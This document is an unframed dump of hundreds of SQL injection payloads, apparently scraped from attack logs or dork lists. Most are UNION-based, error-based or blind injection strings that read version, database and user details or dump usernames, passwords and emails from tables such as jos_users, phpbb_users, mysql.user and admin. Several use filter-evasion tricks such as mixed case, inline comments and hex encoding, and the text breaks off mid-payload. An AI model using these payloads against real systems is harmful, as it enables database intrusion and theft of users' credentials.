1,2,3,4,5,6,group_concat(username,char(58),password,char(58),email),8,9,10,11 from emesgUsers/* -117 union select 1,2,3,4,concat_ws(0x3a,version(),user()),6,7,8,9,10,11,12,13-- -117 union select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5-- -117 union select 1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12 from fb_users limit 3,3/* -117 union select 1,2,concat_ws(database(),user(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 117 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,0/* -117 UNION SELECT 1,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10 from user -117 UnIon selECt 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_Schema=0x6b696464797061676573 -- -1180052984 union select null,null,null,null,null,VERSION(),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/ 1180 union select 1,2,3,4,5,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from user -- -118107 union select 1,2,concat_ws(char(58),name,login),4 from users/* -1183099646' union select 1,user(),version(),database()/* -1183 UNION SELECT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -1184 union select concat_ws(0x3a,database(),version(),user()),2,3 from users -- -11863' UNION SELECT concat_ws(0x3a,version(),user(),database())/* -1186 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- -1188 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- 1189-999.9 union select 1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 118-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 118 and 1=0 union select 1,2,unhex(hex(version())),4,5,6,7 -- 118 and mid(version(),1,1)=5 -118 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,version(),version(),28,29-- -118 UnIon selECt 1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11 from information_schema.tables limit 0,1-- -118 union select 1,2,concat_ws(0x3a,useremail,userpassword),4,null,6,7,8,9,10,11,12 from user/* 118 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1190 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- -1190 union select 1,version(),3 -- -1193 UNION SELECT 1,convert(user using latin1),convert(password using latin1),4,5,6,7,8,9,10,11 from mysql.user/* 1193 union select 1,user,password,4,5,6,7 from mysql.user limit 1,2/* -1194414947 union select null,null,null,null,null,null/**/ -11959 union select 1,2,3,4,user(),password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from mysql.user/* -1198 order by 31-- 11-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 11-999.9 union select 1,2,3,4,5,6,7,concat_ws(version(),user(),database()),9,10-- 11-999.9 union select 1,concat_ws(0x3a,user(),database(),version()),3,4-- 119' and 1=0 UnIon selECt 1,2,3,4,5,group_concat(table_name separator 0x3c62723e),7,8,9 from information_schema.tables where table_schema=0x6e657074756e31 -- 119 and 1=0 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10 -- 119 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,convert(user() using latin1),15/* -119 union select 1,2,3,4,5,6,concat_ws(0x3a3a,mb_id,mb_login,mb_password,mb_email,mb_accept,mb_status,mb_surname,mb_education,mb_province),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cpac_member -- -119 union select 1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8/* -119 union select 1,2,3,4,group_concat(name,0x3a,passward),6,7 from users-- -119 union select 1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11 from user limit 1,1 -- -119 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4 -119 union select 1,2,convert(concat(version(),0x3a,user()) using latin1),4,5,6,7,8,9,10,11,12,13,14/* 119 union select 1,concat_ws(0x3a,version(),user())-- 11 and 1=0 union all select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7 -- 11 and 1=0 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 11 and 1=0 union select 1,2,3,4,5,group_concat(user,char(58),pass) from user_seg 11 and 1=0 union select 1,2,3,4,concat(login,char(58),password),6,7 from avtorw.users -- 11 and 1=0 UnIon selECt 1,2,concat_ws(0x3a,ADMIN_EMAIL,ADMIN_PASS),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from admin -- 11 and 1=0 union select 1,2,group_concat(table_name separator 0x3a),4,5,6,7,8 from information_schema.tables where table_schema=0x616b736c696e65-- 11 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database())-- 11' and 1=2 UNION SELECT 1,2,3,4,5-- 11 and 1=2 union select 1,2,3,4,5,group_concat(login,0x3a,password),7,8 from admin-- -11 and 1=2 union select 1,concat(@@version,0x20,user(),database(),0x20,@@version_compile_os),3,4,5,6,7,8,9,10,11,12-- 11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from jos_users-- -11 and 1=2 union select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5 -- 11 and 1=2 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15/* 11 and 1=(select top 1 @@version from tblUsers) 1=1) and 77=ascii(substring(db_name(),1,1))-- 11 AND ascii(lower(substring(user(),1,1)))=109m 11 AND ascii(lower(substring(version(),2,1)))=46. 11 and null union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()) 11 and substring(version(),1,1)=5 -- 11 limit 0 union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8-- -11 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select version() limit 0,1),1,63),FLOOR(RAND(0)*2))) -- 11 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) 11 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2)))-- 11 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))-- 11 union all select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6-- -11 UNION ALL SELECT null -11 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4 -11 union select 1,2,3,4,5,6,7,8 -- -11 union select 1,2,3,4,5,6,7,8,9 -- -11 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),database(),user()),17,18,19,20-- -11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat(version(),0x3a,user(),0x3a,database()),45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62-- -11' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables -- 11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from msysaccessobjects -11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from price/* -11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(managerlogin,char(58),managerpassword) from managers/* 11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 from news -11 union selecT 1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3a,version(),user(),database()),12 11 UNION SELECT 1,2,3,4,5,6,7,8,9 LIMIT 1,1 1-1 union select 1,2,3,4,5,6,7,8,concat(user,":",password),10,11,12,13,14 from mysql.user/* -11' union select 1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13-- -11 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14-- -11 union select 1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21/* -11 uNion sELect 1,2,3,4,5,6,7,unhex(hex(group_concat(tAblE_nAmE))),9,10,11,12 from information_schema.tables -- 11' union select 1,2,3,4,5,6,7,version()/* -11' union select 1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database()),8,9,10/* -11 UNION SELECT 1,2,3,4,5,6,database(),8,9,0,1,2,3,4/* -11 union select 1,2,3,4,5,6,table_name,8 from information_schema.tables/* -11 union select 1,2,3,4,5,6,version(),8,9 /* 11 union select 1,2,3,4,5,6,version(),8,9,0,1,2,3,4,15 from mysql.user/* -11' union select 1,2,3,4,5,6,version(),user()/* 11' union select 1,2,3,4,5,concat(version(),0x3a,database(),0x3a,user()),7,8,9,10,11,12,13,14/* -11 union select 1,2,3,4,5,concat_ws(0x3a3a,username,password),7,8,9,10,11 from w_users -- 11 union select 1,2,3,4,5,concat_ws(0x3a,uname,pass),7,8,9,0,1,2 From users/* -11 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9-- 11 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user())/* -11 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11-- -11" union select 1,2,3,4,5,null,7,8,9,0,1,2,3,4,5,6,7,8,9,0,user_name,2,3,4,user_password,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from login limit 0,1/* 11 union select 1,2,3,4,concat_ws(0x0b,version(),user(),database()),6,7,8 -11 union select 1,2,3,4,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),6,7,8,9/* 11 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8-- -11 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7 -- -11 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10-- 11 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9 from information_schema.columns limit 1,1 11 union select 1,2,3,4,password,6,7,8,9,10 from mysql.user/* -11 union select 1,2,3,4,table_name,6,7,8,9,10 from information_schema.tables -- 11 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables -11 UNION SELECT 1,2,3,CONCAT(Version(),Database(),User()),5,6,7-- -11 union select 1,2,3,concat_ws(0x3a3a,id,uname,pass,date),5 from elekon_users_tbl -- -11' union select 1,2,3,concat_ws(0x3a,user(),version(),database()) -- -11 union select 1,2,3,concat_ws(0x3a,version(),database(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 11 union select 1,2,3,convert(concat_ws(0x3a,admin,admin_pwl),binary),5,6,7,8 from phpads_config/* -11 union select 1,2,3,login,5,password,7 from access limit 0,1/* -11 UNION SELECT 1,2,3,TABLE_NAME,5,6 FROM INFORMATION_SCHEMA.TABLES/* -11 union select 1,2,3,version(),5,6,7,8,9,10,11 -11 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17/* 11' union select 1,2,concat(email_user,char(58),pass_user) from job_user/* -11' union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8/* -11 union select 1,2,concat(username,0x20,password,0x20,access),4,5,6,7,8,9,10,11 from tbl_rampco_users limit 0,1-- -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8 from jos_users -- 11 union select 1,2,concat(username,0x3a,user_password),4,5 from phpbb_users/* -11 union select 1,2,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),4,5,6,7,8,9,10,11 -- -11 union select 1,2,concat_ws(0x3a3a,concat_ws(0x3a3a,id,admin_name,pwd)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from freetplauctions_admin -- -11 union select 1,2,concat_ws(0x3a3a,login,pass,status),4 from clients -- -11 union select 1,2,concat_ws(0x3a3a,version(),user(),database())/* -11 union select 1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8,9,10 -11 union select 1,2,concat_ws(0x3a,username,password,email),4,5,6,7,8,9,10 from u30316.vb_user limit x,1 -11 UnIon selECt 1,2,CONCAT_WS(0x3a,USER(),VERSION(),DATABASE()),4,5,6,7,8,9,10,11,12,13,14 -- -1 -1 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -11 union select 1,2,concat_ws(0x3a,version(),user(),database())-- -11 union select 1,2,concat_ws(char(124),version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -11 union select 1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13 -11 union select 1,2,convert(concat(version(),0x3a,database(),0x3a,user()) using latin1),4,5,6,7,8,9,10,11,12,13/* -11 union select 1,2,convert(concat_ws(char(58),user(),version(),database() using latin1),4/* -11 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from information_schema.tables -- -11 union select 1,2 from wp_users -11 union Select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x6c6f636174696f6e73 11 union select 1,2,null-- 11 UNION SELECT 1,2,null,CONVERT(concat_ws(0x3a,version(),user(),database()) USING LATIN1),5,6,7,8,9,10/* -11 union select 1,2,password,4 from users/* -11 union select 1,2,table_name,4,5,6 from information_schema.tables-- -11 union select 1,2,table_name,4,5 from INFORMATION_SCHEMA.TABLES limit 1,1/* 11 union select 1,2,user(),database(),5,6,7,8/* -11 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,name,pass),0x55),0x55),3,4,5 from userlist/* 11 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User(),@@version_compile_os),0x71),0x71),3,4 LIMIT 1,1-- -11 UNION SELECT 1,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),3,4,5,6,7,8 11' UNION SELECT 1,concat(email_name,0x3b,email),3,4,5,6,7 FROM careers limit 1,1/* -11 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15 from _user-- -11 union select 1,concat(username,char(58),password) from ipdenis_adamascar.cute_users -- -11 union select 1,concat(user_password,char(58),username) from users/* -11 union select 1,concat(user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -11 union select 1,concat_ws(0x3A3a,version(),user(),database()),3,4,5,6/* 11 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8-- -11 union select 1,concat_ws(0x3a,email,password),3,4,5 from users-- -11 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7 -11 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,11,12,13,14,15,16,17,18,19,20,21,22-- -11) unIon sElecT 1,concat_ws(0x3a, user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13 -- -11 union select 1,CONCAT_WS(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11 -11' union select 1,concat_ws(CHAR(60,98,114,47,62),version(),database(),user()),3,4,5/* -11 union select 1,database(),3,4,5,6,7,8,9,10-- -11 union select 1,database(),3,user(),5/* 11 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables -- -11' union select 1,pass,3,4 from admin /* 11 union select 1,password,username,4,5,6 from admin/* -11 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables -- -11 union select 1,table_name,3,4,5 from information_schema.tables limit 16,100 -- -11 union select 1,user() -- -11 union select 1,user(),3/* -11 union select 1,user(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,version()/* 11 UNION SELECT 1,user,password,4,5,6,7 FROM users/* -11 union select 1,version()29,3,4,5,6,7,8,9-- -11 union select 1,version(),3,4 -- -11 union select 1,version(),3,4,5,6,7,8,9-- 11 UNION SELECT 1,version(),3,4,5,6,7,8,9 LIMIT 1,1 -11 union select 1,version(),3,user(),5,6,7,8,9,10,11,12,13,14,15,16,user()/* 11 union select concat(0x2,version(),user(),database()) limit 1,1 11 UNION SELECT concat(login,0x3a,password),2 From users limit 1,1/* -11 union select concat(version(),0x3a,database(),0x3a,user())-- -11 union select concat_ws(0x3a,user(),@@version_compile_os,version()),2,3-- -11 union select null,null,null,null,null,null,null,null-- -11 union select uid,2,uname,pass,umode,6,7,8 from users-- -1200 UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10 1200 UNION SELECT 1,2,3,4,5,unhex(hex(concat(user(),0x3a,version(),0x3a,database()))),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 LIMIT 1,1 1202 and 1=@@version -1202 union select 1,2,3,4,concat_ws(0x3a,login,pass),6 from user limit 1,1-- 1204 or (1,2) in (select * from(Select name_const(version(),1),name_const(version(),1))eba)/* -12061 union/**/select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -1206 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 1209 and 1=0 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -1209' union select 1,2,version(),4,5,6,7,8,9 -- 120 and 1=0 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()) -- 120 and (select*from(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(char(58),login,name,pwd,email,regdate,rkey) from RegUser limit 0,1),1,64),floor(rand(0)*2)))z)-- -120 union all select 1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7 -- -120 union all select 1,cast(table_name as text) from information_schema.columns-- 120' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -120 union select 1,2,3,4,concat_ws(0x3a,multi_id,0x3a,multi_password,0x3a,multi_skin_name),6,7,8 from multi_admin-- 120' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13/* -120' union select 1,2,version(),concat_ws(0x3a,FName,LName,Email,LoginCount,ID,Password),5,6 from Users limit 0,1/* -120 union select 1,concat(table_schema,char(58),TABLE_NAME),3,4 from INFORMATION_SCHEMA.TABLES limit 1,10/* -120 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -120 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5 -- -120 union select -1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8-- -120 union select 1,concat_ws(0x3a,version(),user(),database())/* -120 union select 1,user(),3,Version(),5,6,7 from INFORMATION_SCHEMA.COLUMNS limit 1/* 120 union select concat_ws(0x3a,login,pass),2,3,4 from admin-- -12119 union select @@version-- 121269546138015100 union select concat_ws(0x3a,user(),database(),version()),2/* 1212 union select 1,password,3,4,5,6,7,8,9,10,11 from mysql.user/* -12135 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12/* -1214 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,VERSION(),62,63,64,65,66,67,68,69,70,71,72,73,74/* -1214 union select concat(username,0x20,password),2,3 from user-- -12151 union select 1,2,3,4,5,6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -1215 union select 1,2,3,table_name from information_schema.tables -- 1215 UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15-- -121633 union select 1,2,3,concat(user(),0x3a,version()),5,6,7,8,9,0,1/* -12168' union select 1,concat(pass,char(58),email,char(58),name),3,4,5,6,7,8,9,10 from sub_user limit 46,1/* 1216-999.9 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- 1217' and 5=substring((select version()),1,1) -- -121815 union select 111,database() -- -121925 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,perms),11,12,13,14,15,16,17,18,19,20,21 from admins -- 121' and 1=0 union select 1,2,3,4,5,concat_ws(0x3a,id,user,pass),7,8,9,10,11 from userlist -- 121 and 1=0 Union Select UNHEX(HEX(version())) 121 and 1=2 union select 1,2,3,4,5,6,concat(username,char(58),password),8,9,10,11,12 from editor-- -121 union all select 1,group_concat(Username,0x3a,Password,0x3a,UserGroup),3,4,5 from uvp_Users 121 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 trader_db_admin/* -121 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),11,12,13,14,15-- -121 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version())-- -121 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17-- -121 union select 1,2,3,4,concat_ws(0x3a,user_id,username,user_password),6,7,8 from phpbb_users/* -121 union select 1,2,3,4,unhex(hex(concat_ws(0x3a3a,version(),user(),database()))),6,7,8,9,10,11,12/* -121 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 1-2.1 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables-- -121 UNION SELECT 1,2,CONCAT_WS(0x3A3a,username,password),4,5,6,7,8 FROM users limit 0,1/* -121 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11/* -121 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),3,4,5 -121' union select 1,concat_ws(0x3a3a,username,PASSWORD,email,type,typeadmin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from news_users limit 1,1 -- 121 union select 1,user(),3,4,5 -121 union select concat_ws(0x3a ,user(),database(),version())-- -121 union select concat_ws(version(),database(),user()),2,3,4,5,6-- -122080 union select 1,convert(concat(user,0x3a,password),binary),3,4,5,6,7,8,9,10 from mysql.user/* -1221 union select 1,user,password,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from mysql.user/* 1223 UNION SELECT 1,concat(version(),0x3a,database(),0x3a,user())/* -1224 union select 1,2,3,4,concat_ws(0x4,user(),database(),version()),6,7,8,9,10,11,12,13,14,15-- 1225589959 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15-- 1226 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -1227' union select 1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16 from news -- -12%27 union select 1,2,3,TABLE_NAME,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 from information_schema.tables-- -12293 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),@@version_compile_os,version()) -- 122 and 1=0 union select 1,2,3,4,aes_decrypt(aes_encrypt(user_pwd,1),1),6 from users where user_name=char(119,97,100,111,111,100) -122 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,database(),version(),user())-- -122 union select 1,2,3,concat_ws(char(58,58),user_id,username,password),5,6,7 from phorum_users/* -122 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7-- -122 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x71),0x71),3,4,5,6,7,8 from mysql.user/* -122 union select 1,concat(user,password),3 from mysql.user-- 122 union select 1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user limit 1,1/* 122 union select concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),2,3,4,5,6,7,8,9,0 limit 1,1 -122' union select concat_ws(0x3a,version(),user()),2-- -1230 union select 1,2,version(),4,user(),6,7,8,9,10,11,12,13,14,15,16-- 12311 union select 1,2,3,4,group_concat(0x3a,username,0x3a,admin,0x3a,kwort),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 from user 123123123 union select 1,concat_ws(0x2f,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22,23,24,25 from users limit 1,1/* -1232 union select 1,2,3,4 -1232 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,count(*),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from users /* 12345674 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15-- 123456789 union select 1,concat(admin_no,0x3a,admin_adi,0x3a,admin_sifre),3,4,5,6 from admin/* 123456) union select 1,2,3,4,5,6,7,8,9,10,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),11,12,13,14,15,16,17 from jos_users limit 1/* 12345 and 1=cast((SELECT version()||chr(58)||current_user||chr(58)||current_database()) as int) -12345 union select 1,2,3,4,5,6,7,8,9,table_name,11,12,13,14 from INFORMATION_SCHEMA.TABLES limit 0,1/* -12345 union select 1,2,3,4,5,concat(name,char(58),passwd),7,8,9,10,11,12,13,14,15,16,17,18 from users limit 0,1/* -12345 union select 1,user(),database(),4,version(),6,7/* 123467834200 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12 -1234' UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 /* -1234 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,39,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -- -1234 union select 1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -1234' union select 1,concat_ws(0x3a,user(),database(),version(),@@basedir) -- -1237 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7-- -12393 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19 from information_schema.tables limit 27,1-- 123' AND 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a,version(),user(),database()),23,24,25,26,27,28,29,30,31 -- 123' and 1=0 UNION SELECT 1,2,3,4,5,6,version(),8 -- -123 aNd 1=0 UNION SELECT 1,2,3,version(),5,6,7 -- -123 inion select 1 -- 123' union all select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- -123 union select 1,2,3,4 -- 123 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- 123 union select 1,2,3,4,5,6,7,concat(user(),char(58),version(),char(58),database()),9/* -123 union select 1,2,3,4,5,CONCAT( user, CHAR(32,58,32), password),7,8,9,10 from mysql.user/* -123 union select 1,2,3,4,concat(username,0x3a,userpwd),6,7,8,9,10,11,12,13,14,15,16,17,18 from siteusers -- 123 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- -123' union select 1,2,3,4,user(),6,7/* -123 union select 1,2,3,concat(version(),char(58),user(),char(58),database()),5,6,7/* -123 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13 -- 123 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5-- -123 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4/* -123 union select 1,2,version(),user(),5,database()/* -123 union select 1,concat(username,0x20,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from jos_users-- 123' /*!union*/ select 